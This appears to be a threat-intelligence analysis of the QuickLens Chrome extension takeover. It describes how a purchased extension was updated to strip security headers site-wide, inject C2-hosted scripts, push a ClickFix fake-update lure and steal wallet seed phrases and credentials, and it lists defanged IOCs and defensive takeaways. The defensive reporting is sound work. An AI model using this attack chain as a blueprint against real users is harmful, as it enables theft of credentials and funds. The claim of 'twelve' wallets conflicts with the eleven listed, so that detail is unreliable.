The QuickLens Chrome extension was purchased through a marketplace, weaponized within 16 days, and pushed to roughly 7,000 users via silent auto-update — stripping browser security headers site-wide, harvesting cryptocurrency seed phrases from twelve named wallets, stealing credentials and session data, and deploying ClickFix social engineering to trigger local code execution. The attack exploits a structural gap in enterprise browser management: extensions that already hold user trust and permissions can be re-weaponized after an ownership transfer without triggering standard supply chain controls. Affected users face irreversible exposure of seed phrases and credentials; organizations face a detection gap that passive monitoring cannot close.
The QuickLens compromise is a clean case study in the acquisition-then-weaponize pattern now documented across multiple browser extension attacks. A buyer purchased an established extension with an existing user base and a prior Google Featured badge — both trust signals — through ExtensionHub, then released a malicious update (version 5.8) 16 days after the ownership transfer on February 1, 2026. The auto-update mechanism that makes browser extensions convenient becomes the delivery vector here: no user action, no new installation prompt, no change in the extension’s apparent identity. Standard software supply chain controls — code signing reviews, vendor vetting, initial permission audits — do not catch post-acquisition permission escalation or behavioral changes in already-installed extensions. The 16-day weaponization window is the operational constraint security teams must plan around; it is too short for passive detection cycles to surface a problem before damage occurs.
Version 5.8 introduced two permissions — declarativeNetRequestWithHostAccess and webRequest — that enabled the attack’s most architecturally significant capability: stripping Content-Security-Policy, X-Frame-Options, and X-XSS-Protection headers from every page the user visited, not just targeted domains. This is not a targeted injection attack; it is a site-wide collapse of browser-enforced security boundaries. With CSP removed, the extension injected inline JavaScript payloads retrieved from the C2 domain api.extensionanalyticspro[.]top via a 1×1 GIF pixel onload trick, executing on every page load. Security teams should treat this as a reminder that webRequest and declarativeNetRequestWithHostAccess permissions are not administrative conveniences — they are capabilities that can functionally neutralize web application security controls that assume browser enforcement of security headers.
The payload chain was modular and sequenced against high-value targets. A first-stage payload contacted google-update[.]icu to serve a fake Google Update prompt, which delivered a ClickFix lure prompting users to run code locally. On Windows, this downloaded googleupdate.exe signed under the certificate entity ‘Hubei Da’e Zhidao Food Technology Co., Ltd.’ — a red flag for endpoint detection — which executed a hidden PowerShell chain connecting to drivers[.]solutions/META-INF/xuoa.sys using the distinctive ‘Katzilla’ user agent string. The second-stage C2 was offline at time of analysis, leaving the full second-stage payload unconfirmed — a genuine gap in the available intelligence. A separate agent directly targeted twelve cryptocurrency wallets: MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Solflare, Backpack, Brave Wallet, Exodus, Binance Chain Wallet, WalletConnect, and Argon. Seed phrase theft from these wallets is irreversible; there is no revocation path. Additional collection targeted form credentials, payment data, Gmail inbox contents, Facebook Business Manager data, and YouTube channel information — a broad harvesting scope consistent with a financially motivated actor building resale-ready credential packages.
Two analytical gaps deserve explicit attention. First, the macOS exposure: Annex’s review suggested AMOS (Atomic Stealer) was deployed against macOS users, but BleepingComputer could not independently confirm this. Security teams in mixed Windows/macOS environments should not treat macOS as unaffected — the correct posture is unresolved exposure, not absence of risk. Second, the ClickFix layer is not specific to this campaign. Huntress documented a separate extension last month that crashed browsers to display fake fix prompts installing ModeloRAT. ClickFix is now consistently appearing as a second-stage delivery mechanism layered on browser extension compromises, which suggests threat actors have standardized on this combination. A browser prompt instructing users to run clipboard code or execute a downloaded file should be treated as a high-confidence attack indicator regardless of how polished the UI appears — this is the behavioral signature to train against.
Detection opportunities exist across the IOC set: C2 domain api.extensionanalyticspro[.]top, redirect domain google-update[.]icu, payload URL drivers[.]solutions/META-INF/xuoa.sys, the ‘Katzilla’ user agent string, the signing certificate entity ‘Hubei Da’e Zhidao Food Technology Co., Ltd.’, and extension ID kdenlnncndfnhkognokgfpabgkgehoddto. Endpoint telemetry queries should target PowerShell executions chaining Invoke-Expression with external URI connections, particularly those using non-standard user agents. DNS and proxy logs should be reviewed retroactively for any of the three IOC domains, as prior installation activity may predate current detection coverage.
- Takeaway 1: Block the three IOC domains — api.extensionanalyticspro[.]top, google-update[.]icu, and drivers[.]solutions — in DNS and proxy controls now, and audit endpoint and proxy logs retroactively for the extension ID kdenlnncndfnhkognokgfpabgkgehoddto.
- Takeaway 2: Any Chrome extension holding webRequest or declarativeNetRequestWithHostAccess permissions can strip CSP and browser security headers globally — audit enterprise extension allowlists and remove or restrict extensions holding these permissions without explicit business justification.
- Takeaway 3: Users who had QuickLens installed must treat all browser-stored credentials, payment data, and session tokens as compromised and rotate them immediately; any of the twelve named cryptocurrency wallets should be migrated to a new wallet address, as stolen seed phrases cannot be revoked.
- Takeaway 4: The 16-day window from ownership transfer to malicious update is too short for passive monitoring — enterprise browser management policies should enforce extension version pinning and require re-review triggered by ownership changes or new permission requests.
- Takeaway 5: ClickFix is now a documented standard layer on browser extension compromises; any in-browser prompt instructing users to run clipboard code or execute a downloaded file is a high-confidence attack indicator and should be covered in user security awareness training as a named technique.
- Takeaway 6: macOS exposure via AMOS (Atomic Stealer) was suggested by Annex but not independently confirmed — mixed-environment security teams should treat macOS users as potentially affected and monitor accordingly rather than assuming Windows-only scope.
